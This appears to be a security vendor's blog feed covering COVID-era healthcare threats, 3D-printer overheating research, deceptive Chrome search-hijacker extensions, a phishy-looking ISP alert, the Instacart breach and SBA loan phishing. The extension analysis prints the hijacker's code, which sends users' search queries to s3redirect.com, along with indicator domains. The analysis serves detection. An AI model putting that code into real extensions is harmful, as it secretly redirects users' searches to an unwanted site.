IT NEWS

The impact of COVID-19 on healthcare cybersecurity

As if stress levels in the healthcare industry weren’t high enough due to the COVID-19 pandemic, risks to its already fragile cybersecurity infrastructure are at an all-time high. From increased cyberattacks to exacerbated vulnerabilities to costly human errors, if healthcare cybersecurity wasn’t circling the drain before, COVID-19 sent it into a tailspin.

No time to shop for a better solution

Too occupied with fighting off the virus, some healthcare organizations have found themselves unable to shop for security solutions better suited to their current situation.

For example, the Public Health England (PHE) agency, which is responsible for managing the COVID-19 outbreak in England, decided to prolong its existing contract with its main IT provider without allowing competitors to put in an offer. It did this to ensure its main task, monitoring the spread of the disease, could go forward without service interruptions or other concerns.

Extending a contract without looking at competitors is not only a recipe for getting a bad deal, but it also means organizations are unable to improve on the flaws they may have found in existing systems and software.

Attacks targeting healthcare organizations

Even though there were some early promises of removing healthcare providers as targets after COVID-19 struck, cybercriminals just couldn’t be bothered to do the right thing for once. In fact, we have seen some malware attacks specifically target healthcare organizations since the start of the pandemic.

Hospitals and other healthcare organizations have shifted their focus and resources to their primary role. While this is completely understandable, it has placed them in a vulnerable situation. Throughout the COVID-19 pandemic, an increasing amount of health data is being controlled and stored by the government and healthcare organizations. Reportedly this has driven a rise in targeted, sophisticated cyberattacks designed to take advantage of an increasingly connected environment.

In healthcare, it’s also led to a rise in nation-state attacks aimed at stealing valuable COVID-19 data and disrupting care operations. In fact, the sector has become both a target of advanced attacks and a vehicle for social engineering. Malicious actors taking advantage of the pandemic have already launched a series of phishing campaigns using COVID-19 as a lure to drop malware or ransomware.

COVID-19 has not only placed healthcare organizations in direct danger of cyberattacks, but some have become victims of collateral damage. There are, for example, COVID-19-themed business email compromise (BEC) attacks that might be aiming for exceptionally rich targets. However, some will settle for less if it is an easy target—like one that might be preoccupied with fighting a global pandemic.

Ransomware attacks

As mentioned before, hospitals and other healthcare organizations run the risk of falling victim to the “spray and pray” attack methods used by some cybercriminals. Ransomware is only one of the possible consequences, but arguably the most disruptive when it comes to healthcare operations—especially those in charge of caring for seriously ill patients.

INTERPOL has issued a warning to organizations at the forefront of the global response to the COVID-19 outbreak about ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments. INTERPOL’s Cybercrime Threat Response team detected a significant increase in the number of attempted ransomware attacks against key organizations and infrastructure engaged in the virus response.

Special COVID-19 facilities

During the pandemic, many countries constructed or refurbished special buildings to house COVID-19 patients. These were created to quickly increase capacity while keeping the COVID patients separate from others. But these ad-hoc COVID-19 medical centers now have a unique set of vulnerabilities: They are remote, they sit outside of a defense-in-depth architecture, and the very nature of their existence means security will be a lower priority. Not only are these facilities likely to have understaffed IT departments, but the biggest possible chunk of their budget is devoted to helping patients.

Another point of interest is the transfer of patient data from within the regular hospital setting to these temporary locations. It is clear that the staff working in COVID facilities will need the information about their patients, but how safely is that information being stored and transferred? Is it as protected in the new environment as it was in the old one?

Data theft and protection

A few months ago, when the pandemic proved hard to beat, many agencies reported on targeted efforts by cybercriminals to lift coronavirus research, patient data, and more from the healthcare, pharmaceutical, and research industries. Among these agencies were the National Security Agency, the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, and the UK National Cyber Security Centre.

In the spring, many countries started discussing the use of contact tracing and/or tracking apps—apps that would warn users if they had been in the proximity of an infected person—in an effort to help keep the pandemic under control. Understandably, many privacy concerns were raised by advocates and journalists.

There is so much data being gathered and shared with the intention of fighting COVID-19, but there’s also the need to protect individuals’ personal information. So, several US senators introduced the COVID-19 Consumer Data Protection Act. The legislation would provide all Americans with more transparency, choice, and control over the collection and use of their personal health, device, geolocation, and proximity data. The bill would also hold businesses accountable to consumers if they use personal data to fight the COVID-19 pandemic.

The impact

Even though such a protection act might be welcome and needed, the consequences for an already stressed healthcare cybersecurity industry might be overwhelming. One could argue that data protection legislation should not be passed on a case-by-case basis, but should be in place to protect citizens at all times, not just when extra measures are needed to fight a pandemic.

In the meantime, we at Malwarebytes will do our part to support those in the healthcare industry by keeping malware off their machines—that’s one less virus to worry about.

Stay safe, everyone!

Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Emory Roane, policy counsel at Privacy Rights Clearinghouse, about parental monitoring apps.

These tools offer parents the ability to see where their children go, read what their kids read, and prevent them from, for instance, visiting websites deemed inappropriate. And for the likely majority of parents using these tools, their motives are sympathetic—being online can be a legitimately confusing and dangerous experience.

But where parental monitoring apps begin to cause concern is just how powerful they are.

Tune in to hear about the capabilities of parental monitoring apps, how parents can choose to safely use these with their children, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

Other cybersecurity news

  • Intel experienced a leak due to “intel123”—the weak password that secured its server. (Source: Computer Business Review)
  • Fresh Zoom vulnerabilities for its Linux client were demonstrated at DEF CON 2020. (Source: The Hacker News)
  • Researchers saw an increase in scam attacks against users of Netflix, YouTube, HBO, and Twitch. (Source: The Independent)
  • TikTok was found collecting MAC addresses from mobile devices, a tactic that may have violated Google’s policies. (Source: The Wall Street Journal)
  • Ads for apps labelled “stalkerware” could still be found in Google Play’s search results after the search giant’s advertising ban took effect. (Source: TechCrunch)

Stay safe, everyone!

Explosive technology and 3D printers: a history of deadly devices

Hackers: They’ll turn your computer into a BOMB!

“Hackers turning computers into bombs” is a now legendary headline, taken from the Weekly World News. It has rather set the bar for “people will murder you with computers” anxiety. Even those familiar with the headline may not have dug into the story too much on account of how silly it sounds, but it’s absolutely well worth checking out if only for the bit about “assassins” and “dangerous sociopaths.”

Has blasting apart your computer “like a large hand grenade” ever been so much fun? Would it only be a little bit terrifying if the hand grenade was incredibly small? How many decently-sized grenades does it take to make your computer explode like a bomb, anyway? Is the bomb also incredibly large? What kind of power are we talking about here? Because it would frankly be anti-climactic if it all turned out to be a hoax.

Maybe the real grenades were the bombs we made along the way

However you stack it up, the antics of highly combustible cyber assassins are often overplayed for dramatic effect. At this point I’d like to ask, “Who remembers the terrible Y2K trend of exploding computers?”, but as you’re aware, that didn’t actually end up happening. Lots of hard-working people spent an incredible amount of time ensuring the Millennium bug didn’t cause Millennium-bug-related problems, but I don’t think they were thinking of dramatic explosions when they were doing so.

Still, there’s always been a way to affect hardware in (significantly less spectacular) ways, though most cases seem to come down to user error or tinkering with hardware hacks. Even the article above mentions someone claiming to make one of these machines start smoking by writing programs which toggled the cassette relay switch rapidly. I myself once woke up to a PC on fire (and I do mean on fire) after something broke overnight, and I was met with the smell of burning metal, melting plastic, and an immediate concern about not having the house burn down around me.

Evil cyber assassins making you explode, though?

Not that common, sorry. However, there has been the occasional bad event over the years where hardware was specifically targeted in frankly terrifying ways.

Breaking hardware for fun, profit, and confusion

Before we run through some of the most common ways hardware can be impacted in ways it probably shouldn’t be, we’ll set the bar early and highlight what’s likely the biggest, baddest example of hardware tampering. Stuxnet, a worm targeting SCADA systems, caused large amounts of damage at a nuclear facility in Iran between 2009 and 2010. It did this by speeding up, slowing down, and then speeding up centrifuges until they were unable to cope and broke. Up to 1,000 centrifuges were taken down as a result of the attack [PDF]. This is an assault which clearly took an incredible amount of planning and prep work to pull off, and you’ll see the phrase “nation-state attack” an awful lot if you go digging into it.

This is, without a doubt, the benchmark for dragging digital attacks into real-world impact. A close runner-up would be 2017’s WannaCry attack, which impacted the NHS [PDF]. The key difference is that the plant in Natanz was deliberately targeted, and the infection had specific instructions for a specific task related to the centrifuges. The NHS was “simply” caught in the fallout, and not targeted specifically.

Attacks on people at home, or smaller organisations, tend to be on a much smaller scale. The idea isn’t really to break the hardware beyond repair to make some sort of statement; the device is only useful to attackers if they can keep on using it. Even so, the impact can range from “mild inconvenience” to “potentially life threatening”.

What’s mining is mine

You could end up with a higher electricity bill than normal should you find some Bitcoin miners hiding under the hood. This might keep you warm on a chilly winter evening, but it’s not particularly kind to your finances or your individual PC parts. The problem with your standard Bitcoin miner placed on a system without permission is the resources it gobbles up for computations. Miners love those big, juicy graphics cards for maximum money-making.

Having said that, your child’s middle-range gaming laptop is also a perfectly acceptable target for them. If the cooling fans are going haywire even when no game is running, it might be time to start running some scans. Overheating can be mitigated on desktops unless they’re clogged up with a lot of dust or faulty parts, but the margin for error is a lot smaller with a laptop. All that heat built up in one significantly smaller space over time isn’t great, and while toasting the machine wouldn’t be part of the Bitcoin miner’s game plan, it’s one side effect to be wary of.

On the flipside, modern systems are actually pretty good at combating heat…especially if you’re even a little bit into gaming. The reason you don’t see stories in the news about evil hackers melting computers is that (a) it is, again, ultimately pointless, and (b) it would be pretty difficult to pull off. Hardware comes with all sorts of failsafes: temperature sensors, shutdown routines, power spike protection, and much more. It would mean significant amounts of time and effort, in the vague hope you end up with something a little more impressive than “the PC shut down to prevent damage and it’s fine”.

BIOS/firmware hacks

Could you bludgeon your way into the very innards of the PC and force it to do all sorts of terrible things? Perhaps. As with a lot of these scenarios, it typically relies on multiple steps and one specific target in mind. Malicious firmware is a possibility, but you’ll need to weigh the risk against the likelihood of it happening. Once more, we see the inherent drawback in “make thing go boom”, or even just bricking the machine forever so it’s unusable. Having someone go to these lengths to attack your PC in this way is probably outside your threat model.

Not impossible, but unlikely. Somebody doing the above wants your data, not your laptop on fire. Even so, you absolutely should be cautious when in a place that isn’t your home.

IoT compromise

The world is filled with cheap, poorly secured bits of technology filling up our homes. Security is an afterthought, and even where it isn’t, bad things can still happen. At the absolute opposite end of pretend hackers turning your computer into a bomb are the people whose sole intention is to compromise devices and live on them for as long as possible. Information and control are the two key currencies for domestic abusers implanting hacks into hardware.

Awfully bad, but awfully rare

These are all awful things, in varying degrees of severity. They tamper with systems and processes in ways which can directly impact the physical operation of a device, or do it in a manner which leaves the object intact but causes trouble in the real world in other, less incendiary ways.

In terms of making things blow up, bomb style, we’re still at a bit of a loss.

All the same: there is a genuine threat aspect to all this, as we’re about to find out.

Strap yourself in and command the DeLorean as we jump from a Register article back in July 2000 to another one along similar lines at the tail end of July 2020. Despite the warnings, 20 years on we’re finally at the point where something a bit like your PC could go kaboom.

The entity known as time comes crashing through the window, reminding me of my melted and very much ablaze PC from about fourteen years ago. Your devices can and do catch fire for a variety of reasons, and they don’t have to be related to hacking.

In the case of a 3D printer enthusiast who found their device billowing smoke, the likely culprit was a loose heating element and a bit of bad luck to set everything ablaze. Note that the post-incident assessment includes a rework of the physical space around the device. Everything from storage to safety equipment is now considered, to combat (as they put it) the placement of a heavy-duty bit of kit inside a “burn-my-house-down box”.

This is similar to ensuring the space around a VR gaming setup is also secured: mats on the floor so you know when you’ve wandered out of the safety zone, wires suspended from the ceiling, no sharp or dangerous items nearby, and so on. Sadly, people don’t always consider the ways in which physical danger presents itself via digital devices.

Keep all of this in mind, when checking out what comes next.

What comes next, is a 3D printer modified with the intention of seeing if it’s possible to “weaponize this 3D printer into a firebomb”.

Weaponizing a 3D printer into a firebomb?

Researchers at Coalfire toiled hard at creating a hand-crafted method to alter the way a specific 3D printer operates and have it hit increasingly dangerous temperatures. In their final bout of testing, the smoke and fumes were so bad in an outdoor location that they couldn’t get closer than 6ft to the smouldering device.

This is, of course, an incredibly bad situation to be in. However, there are some big caveats attached to this one in terms of threat. All 3D printers are a potential fire risk, because they naturally enough involve activities requiring high temperatures. If you leave them alone…and you really shouldn’t…you could end up with the aforementioned burn-my-house-down box. There are also emissions to consider.

In my former life as an artist, I did a lot of work around old-style MDF, which released all manner of bad things if you cut into it, so precautions had to be taken. Similarly, you have to pay attention to what may be wafting out of your printer.

I’ve dabbled in 3D printing a little bit, and the technology encourages me to treat it with a healthy bit of respect on account of how deadly it could be by default, with no tampering required, simply via me getting something wrong.

A good approach generally, I find.

Of worst case scenarios

We don’t know for sure how badly the smoking printer incident would’ve ended, given the switch-off when the fumes became too much. A total meltdown seems likely, but a “bomb” as such probably isn’t on the cards.

This also isn’t something you can casually throw together at the drop of a hat. It’s not one short blog post showing how easy it is; it’s three posts of trying an awful lot of things out: rooting the printer and cracking passwords, digging into board architecture, installing NSA tools to explore functions. Much more.

Creating extra space to house the new code, adjusting the max temperature variable, then having to figure out how to bypass the error protection closing down any overenthusiastic temperature increases.

Much, much more.

Note also that to force the device to overheat beyond the safe “cut out” point, they had to replace the power supply with something bigger to achieve the required cookout levels.

It’s an awful lot of work to set your printer on fire. Of course, one worry might be a situation where the modified code is somehow pushed to device owners after some sort of compromise. You could also perhaps send people the rogue code directly as a supposed “update” and let them do the hard work.

One way around this is signed code from the vendor, though there’s usually resistance to that from some folks in maker circles because of issues related to planned obsolescence. Additionally, some prefer to download updates directly from the manufacturer’s website and aren’t keen on auto-updates for their printing tools.

Even so: regardless of the issues surrounding who wants which type of update, or whether signed code would fix things or bring unforeseen hassles for the end user, somebody compromising you remotely in this way would still need you to have swapped in a bigger power supply for the big boom.

That’s not very likely.

Hackers: they’ll turn your printer into a BOMB!

For the time being, your printer is (probably) not going to fulfil the prophesied digital cyber-grenade of lore. You’ve got more than enough to be getting on with where basic precautions are concerned, never mind worrying about someone blowing up your house with a toaster or USB headphones.

Treat your 3D printer with respect, follow the safety guidelines for your device, and never, ever leave it running and unattended. You don’t want to end up on the front page of the Weekly World News in 2040.

Chrome extensions that lie about their permissions

“But I checked the permissions before I installed this pop-up-blocker—it said nothing about changing my searches,” my dad retorts after I scold him for installing yet another search-hijacking Chrome extension. Granted, they are not hard to remove, but having to do it over and over is a nuisance. This is especially true because it can be hard to find out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive about the permissions they are going to use in their install prompt. One of these extensions, called PopStop, claims it can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It has become habit for browser extensions to ask up front only for the permissions needed to function properly—then ask for additional permissions later on, after installing. Why? Users are more likely to trust an extension with limited warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only give you half the story? In this case, the PopStop extension doesn’t just read your browsing history, as the pop-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward about what they do once installed, when they are listed under the browser’s installed extensions.

Niux APP extension

But others are consistent in their lies even after they have been installed, which makes it even harder to find out which one is responsible for the search hijack.

PopStop extension

How is this possible?

Google decided at some point to bar extensions that obfuscate their code. This makes it easier to read a plug-in’s programming and conduct appropriate analysis.

The first step in determining what an extension is up to is looking at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is “background.js” and the declared permissions are “tabs” and “storage”. More about those permissions later on.
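
As a rough sketch, the relevant parts of such a manifest might look like the following (the script name and the two permissions come straight from the extension; the remaining field values are illustrative):

{
  "manifest_version": 2,
  "name": "PopStop",
  "version": "1.0",
  "background": {
    "scripts": ["background.js"],
    "persistent": true
  },
  "permissions": ["tabs", "storage"]
}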

The relevant parts in background.js are these pieces, because they show us where our searches are going:

const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;

// Open a new tab that sends the captured search query to the hijacker's domain
chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});

// A moment later, close the tab that would have shown the real search results
setTimeout(() => {
  chrome.tabs.remove(currentTabId);
}, 10);

This script uses two chrome.tabs methods: one to create a new tab based on your search query, and the other to close the current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

“You can use most chrome.tabs methods and events without declaring any permissions in the extension’s manifest file. However, if you require access to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the “tabs” permission in the manifest.”

And indeed, in the manifest of this extension we found:

"permissions": [ "tabs", "storage" ],

The “storage” permission does not invoke a message in the warning screen users see when they install an extension. The “tabs” permission is the reason for the “Read your browsing history” message. Although the chrome.tabs API might be used for different reasons, it can also be used to see the URL that is associated with every newly-opened tab.

The extensions we found managed to avoid displaying the message “Read and change all your data on the websites you visit” that would be associated with the “tabCapture” method. They did this by closing the current tab after capturing your search term and opening a new tab to perform the search for that term on their own site.

The “normal” permission warnings for a search hijacker would look more similar to this:

warning1 ConvertrSearch

The end effect is the same, but an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call it a lie. Some may say no, they simply didn’t offer the whole truth. However, the point of those permissions pop-ups is to give users the choice of whether to install a program by being upfront about what that program asks of its users.

In the case of these Chrome extensions, then, let’s just say that they’re not disclosing the full extent of the consequences of installing their extensions.

It might be desirable for Google to add a warning message for extensions that use the chrome.tabs.create method. This would inform users that the extension is able to open new tabs, which is one way of showing advertisements, so they would be made aware of this possibility. And chrome.tabs.create also happens to be the method that this extension uses to replace the search results we were after with its own.

An additional advantage for these extensions is the fact that they don’t get mentioned in the settings menu as a “regular” search hijacker would.

searchsettings
A search hijacker that replaces your default search engine would be listed under Settings > Search engine

Not being listed as the search engine replacement, again, makes it harder for a user to figure out which extension might be responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

search header

This will probably change once their current domains are flagged as landing pages for hijackers, and new extensions will be created using other landing pages.

Further details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all Google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

They also intercept all queries that contain the string “spalp2020”. This is probably because that string is a common factor in the installer URLs that belong to the powerapp.download family of hijackers.

spapl2020

Search hijackers

We have written before about the interests of shady developers in the billion-dollar search industry and reported on the different tactics these developers resort to in order to get users to install their extensions or use their search sites[1],[2],[3].

While this family doesn’t use the most deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read the install prompt messages carefully to determine whether an extension is safe. It’s disappointing that developers can evade giving honest information and that these extensions make their way into the webstore over and over again.

IOCs

Extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

Search domains:

s3redirect.com

s3arch.page

gooogle.page <= note the extra “o”

Malwarebytes detects these extensions under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

“Can you have a look at this email I got, please?” my brother asked. “It looks convincing enough, but I don’t trust it,” he added and forwarded me the email he received from Ziggo, his Internet Service Provider (ISP). Shortly after, he informed me that despite its suspicious aura, he found confirmation that the email was, in fact, legitimate.

In the suspect email, the Dutch ISP informed customers that an expert had found a weakness in the “Wifibooster Ziggo C7,” a device they sell to strengthen WiFi signals. Ziggo told users how to recognize this equipment, and urged them to change the default password and settings.

So what’s the problem? Alerting customers about a security flaw is best practice, is it not? Absolutely. But when your email alert about a security vulnerability looks like a phish itself, it’s time to reevaluate your email marketing strategy.

In this blog, I’ll break down what exactly happened with Ziggo, the flaws in their email communication, and how organizations should approach informing their employees and customers about potential security issues—without looking like a phishing scam.

What exactly happened?

Dutch ISP Ziggo sent out an email to their customers warning about a security weakness in a specific device that they sell to their customers. I translated the relevant parts of the mail from Dutch below:

“Dear Mister Arntz,

To keep our network safe, experts are looking for weak spots. Unfortunately, such a weakness was found in the Wifibooster Ziggo C7. You can recognize the device by the ‘C7’ mark at the bottom. This email is about this device and this type only.

Do you indeed use the Wifibooster Ziggo C7? In that case change the default settings in your personal settings to keep your device safe. Below we will explain how.

How to change your password

To make the chance of abuse as small as possible, it’s necessary to change your password. Go to link to Ziggo site, follow the instructions there and use a strong password.

Want to know more or need help?

Follow the link to the Ziggo forum where you can find more information about this subject and ask for help from the community members.”

This vague, unhelpful, and frankly dangerous advice was followed by a footer that contained nine more links, including (ironically enough) an anti-phishing warning.

What made the email look spammy?

We have spent years training people to recognize spam emails, and it is gratifying when our efforts pay off on occasion. The things my brother found to be spammy were all the weird-looking links in the email and the fact that he did not own the device that was the subject of the email.

I would like to add that the email mentioned a security weakness but did not specify which one. Also, urging recipients to change their password to avoid danger would be a dead giveaway in a phishing mail.

So, we’ve got:

  • Subject does not apply directly to all receivers. Not every addressee had said device. When asked, Ziggo stated they wanted to make sure that users who bought the device second-hand would be aware of the issue too.
  • A multitude of links that looked phishy, probably because they were personalized.
phishy looking link
  • Urging receivers to go to a site and take precautions against an unclear threat.

The device

The Wifibooster Ziggo C7 is in fact a TP-Link Archer C7 that Ziggo sells to their customers with their own firmware installed. Therefore, it is hard to find any information about what the vulnerability might be. The Archer C7 is listed as affected by the WPA2 Security (KRACKs) vulnerability for certain firmware versions. But given the Ziggo device comes with custom firmware, it is hard to determine whether the Wifibooster Ziggo C7 is vulnerable as well.

Based on the fact that users are urged to change their WiFi passwords and the name of the network (SSID), and looking at the instructions we found on the site, we are inclined to conclude that the device shipped with default credentials, which might help attackers exploit a remote access vulnerability.

The possible danger

Ziggo warned the users that not following their instructions could lead to unauthorized access to their network.

We asked our resident hardware guru JP Taggart about this scenario, and he was very wary of ISPs that put anything more than some branding tweaks on top of the manufacturer’s firmware. Once you start to drift away from the standard firmware, you are responsible for maintaining and patching that firmware, because the manufacturer will no longer be able, or even willing, to. We have looked at some existing vulnerabilities for the Archer C7, but they are old, and if they applied, they couldn’t be cured by changing the password and SSID.

ISPs make a habit of branding the firmware for the equipment they sell to their customers. Logic dictates that the security flaw must have been in this branded firmware, since we could not find any other recent warning about this particular type of device. That would demonstrate JP Taggart’s point about the dangers of branded firmware.

What Ziggo could have done better

The most objectionable part of the method Ziggo chose is the phishy-looking format of the email they constructed. The more companies do this, the harder it is for us to tell the real phishes apart from the legitimate emails. To be honest, some of the more sophisticated phishers have produced emails that looked less phishy than this one.

They also could have been a lot more open about the security flaw that was found. Of course, we don’t expect them to post a full hacker’s guide on how to use an exploit and spy on your neighbor, but a little bit of concrete information on what was found and how it could be exploited would have made sense.

As for the instructions on how to change the settings, it would have been preferable to list the basic steps in the email and include a link for those who need further or more detailed instructions. All the relevant and necessary information should have been in the mail itself, not behind a link. Links are fine, but not for crucial information.

During the installation of such a device, the ISP should force the user to change the default password at the very least, and probably advise them to change the SSID as well. A default SSID tells an aspiring hacker which ISP you are using, from which they can make some informed guesses about which equipment you are using.

The danger of sending out phishy emails

Affected customers may have deleted the mail at first sight and never changed their password, leaving them vulnerable to the “flaw”.

Or, as our own William Tsing wrote in an older post called When corporate communications look like a phish:

“Essentially, well-meaning communications with these design flaws train an overloaded employee to exhibit bad behaviors—despite anti-phishing training—and discourage seeking help.”

This is also true for home users, who may not receive as many emails as an office employee does (around 120 a day). Those who do receive a lot of mail have trained themselves to recognize the emails that are important and ignore the rest. That would be a shame if the included information is as important as the ISP wants us to believe.

Stay safe, everyone!

The skinny on the Instacart breach

The COVID-19 outbreak has affected many facets of our lives—from how we visit our families, socialize with friends, meet with colleagues, to how we should be conducting ourselves outside of our homes. Ideally, a few meters apart from everyone else and with a mask on.

These—on top of imposed lockdowns—have pushed most people to stay indoors, driving them to do almost everything they want to do in real life online instead. This includes grocery shopping.

It is no wonder, then, to see a sudden spike in downloads of food and grocery delivery apps. Similarly, it is no wonder that it didn’t take long for those with ill intent to find a way to score big from the brands behind these apps. Or have they really?

Instacart, one of the top three brands in grocery delivery and pick-up services in the world, was recently believed to have been hacked after more than 270,000 customer accounts were seen being peddled on the dark web. These accounts reportedly contained information such as names, addresses, credit card data, and transaction history.

BuzzFeed News, which initially reported the incident, interviewed some affected parties who, upon being shown data taken from the breach, confirmed it was indeed their data being sold. A cybersecurity expert who also looked at some of the data put more weight behind the breach’s validity.

Days after the report, however, Instacart denied that a security breach happened. “Our teams have been working around the clock to quickly determine the validity of reports related to site security and so far our investigation had shown that the Instacart platform was not compromised or breached,” the company wrote in a Medium post.

Instead, the company asserted the belief that the reason client accounts may have been broken into was because their clients had been reusing login credentials.

As you may already know, password reuse is a huge cybersecurity problem, where the onus rests on users who continue to use the same username-password combinations on many or all of their online accounts. This results in a chain of compromises for one individual. If an Instacart customer uses the same credentials to access their Twitter feed, Facebook page, favorite online magazine or news sites, online banking, or cloud storage accounts, for example, a compromise of any one of those sites would result in compromise of all the others.

While the reuse of credentials is indeed a known cybersecurity problem, solving it should not be up to users alone. One cannot help but wonder if all 278,531 affected accounts were breached because people had been reusing username-password combinations.

Whether you’re on the side of “Yes, they’ve been breached!” or “No, they’re securing my data well,” one thing is certain: Instacart shoppers and Internet users should play their part in keeping their online accounts as impenetrable as possible. While making sure you don’t reuse username and password combinations between accounts is one way to secure against multiple breaches, it’s certainly not foolproof protection.

If remembering passwords is challenging, you can always enlist the help of a trusty password manager that will serve as your memory and keep your credentials (and other important bite-size information) encrypted and away from prying eyes. For added security, use two-factor/multi-factor authentication.

On the other hand, security is not just the customers’ problem. Companies like Instacart should play their part, too, and own their piece of the pie. They can start by securing their websites against credential stuffing, credit card skimmers, and other threats that target customer accounts. They can also require multi-factor authentication for new clients and inform or push existing ones to enable this feature for their accounts.

Of course, this should not be the end of securing user data for companies. Privacy compliance, PCI compliance, and encrypting data at rest and in transit are key to keeping customer credentials secure. Otherwise, organizations may find themselves skewered on Reddit.

Stay safe, shopper!

A week in security (August 3 – 9)

Last week on Malwarebytes Labs, on our Lock and Code podcast, we talked about identity and access management technology. We also wrote about criminals scoring big with business email compromise, discussed how the Data Accountability and Transparency Act of 2020 looks beyond consent, and analyzed how the Inter skimming kit is used in homoglyph attacks.

Other cybersecurity news

  • A new and unpatchable exploit was allegedly found on Apple’s Secure Enclave chip. (Source: 9to5Mac)
  • The Australian government will include the capability for the Australian Signals Directorate to help law enforcement agencies identify and disrupt serious criminal activity—including in Australia. (Source: The Guardian)
  • The US Department of State is offering a $10 million reward for any information leading to the identification of any person who meddles in US elections. (Source: ZDNet)
  • Facebook Inc.’s Instagram photo-sharing app is launching its clone of TikTok in more than 50 countries. (Source: Bloomberg)
  • Intelligence agencies in the US have released information about a new variant of the Taidoor virus used by China’s state-sponsored hackers targeting governments, corporations, and think tanks. (Source: The Hacker News)
  • A Zoombombing attack disrupted the bail hearing of one of the alleged Twitter hackers. (Source: Naked Security)
  • American small- and medium-sized companies (SMBs) were actively targeted by LockBit ransomware operators according to an Interpol report. (Source: Bleeping Computer)
  • The Clean Network program is a comprehensive approach to guarding US citizens’ privacy and US companies’ most sensitive information from aggressive intrusions by malign actors. (Source: US Department of State)
  • A researcher found a way to deliver malware to macOS systems using a Microsoft Office document containing macro code. (Source: SecurityWeek)
  • The Chrome Web Store was slammed again for allowing 295 ad-injecting, spammy extensions that were downloaded 80 million times. (Source: The Register)

Stay safe!

SBA phishing scams: from malware to advanced social engineering

A number of threat actors continue to take advantage of the ongoing coronavirus pandemic through phishing scams and other campaigns distributing malware.

In this blog, we look at three different phishing waves targeting applicants for COVID-19 relief loans. The phishing emails impersonate the US Small Business Administration (SBA) and are aimed at delivering malware, stealing user credentials, or committing financial fraud.

In each of these campaigns, criminals are spoofing the sender’s email so that it looks like the official SBA’s. This technique is very common and unfortunately often misunderstood, resulting in many successful scams.

GuLoader malware

In April, we saw the first wave of SBA attacks using COVID-19 as a lure to distribute malware. The emails contained attachments with names such as ‘SBA_Disaster_Application_Confirmation_Documents_COVID_Relief.img’.

US SBA phishing scam
Figure 1: Spam email containing malicious attachment

The malware was the popular GuLoader, a stealthy downloader used by criminals to load the payload of their choice and bypass antivirus detection.

Traditional phishing attempt

The second wave we saw involved a more traditional phishing approach where the goal was to collect credentials from victims in order to scam them later on.

traditional US SBA scam
Figure 2: Phishing email luring users to a site to enter their credentials

A URL, especially one that has nothing to do with the sender, is a big giveaway that an email may be fraudulent. But things get a little more complicated when attackers use attachments that look legitimate.

Advanced phishing attempt

This is what we saw in a pretty clever and daring scheme that tricks people into completing a full form containing highly personal information, including bank account details. These details could be used to directly drain accounts, or in an additional layer of social engineering that tricks users into paying advance fees that don’t exist as part of the real SBA program.

advanced US SBA phishing attempt
Figure 3: Phishing email containing a loan application form

This latest campaign started in early August and is convincing enough to fool even seasoned security experts. Here’s a closer look at some red flags we encountered as we analyzed it.

Most people aren’t aware of email spoofing and believe that if the sender’s email matches that of a legitimate organization, it must be real. Unfortunately, that is not the case, and there are additional checks that need to be performed to confirm the authenticity of a sender.

There are various technologies for confirming the true sender address, but we will instead focus on the email’s headers, a sort of blueprint that is available to anyone. Depending on the email client, there are different ways to view these headers. In Outlook, you can click File and then Properties to display them:

outlook email headers to avoid scams
Figure 4: Email headers showing suspicious sender

One of the items to look at is the “Received” field. In this case, it shows a hostname (park-mx.above[.]com) that looks suspicious. In fact, we can see it has already been mentioned in another scam campaign.

If we go back to this email, we see that it contains an attachment, a loan application with the 3245-0406 reference number. A look at the PDF metadata can sometimes reveal interesting information.

SBA scam pdf metadata
Figure 5: Suspicious load application form and its metadata

Here we note the file was created on July 31 with Skia, a graphics library for Chrome. This tells us that the fraudsters created that form shortly before sending the spam emails.

For comparison, if we look at the application downloaded from the official SBA website, we see some different metadata:

official SBA pdf metadata
Figure 6: Official loan application form and its metadata

This legitimate application form was created using Acrobat PDFMaker for Word on March 27, which coincides with the pandemic timeline.
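
If you want to check a PDF yourself without a dedicated viewer, here is a minimal sketch in Node.js (the filename is hypothetical, and this only catches metadata stored as plain literal strings in the PDF’s Info dictionary, not compressed or XMP metadata):

// Pull Creator, Producer, and CreationDate strings out of a PDF's Info dictionary.
const fs = require('fs');

const raw = fs.readFileSync('loan-application.pdf').toString('latin1');
for (const key of ['Creator', 'Producer', 'CreationDate']) {
  // Matches entries such as: /Creator (Acrobat PDFMaker 15 for Word)
  const match = raw.match(new RegExp(`/${key}\\s*\\(([^)]*)\\)`));
  if (match) console.log(`${key}: ${match[1]}`);
}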

The loan application would typically be printed out and then mailed to a physical address at one of the government offices. If we go back to the original email, it asks to send the completed form as a reply via email instead:

malwarebytes fake sba scam email
Figure 7: Reply email would send loan application form to criminals

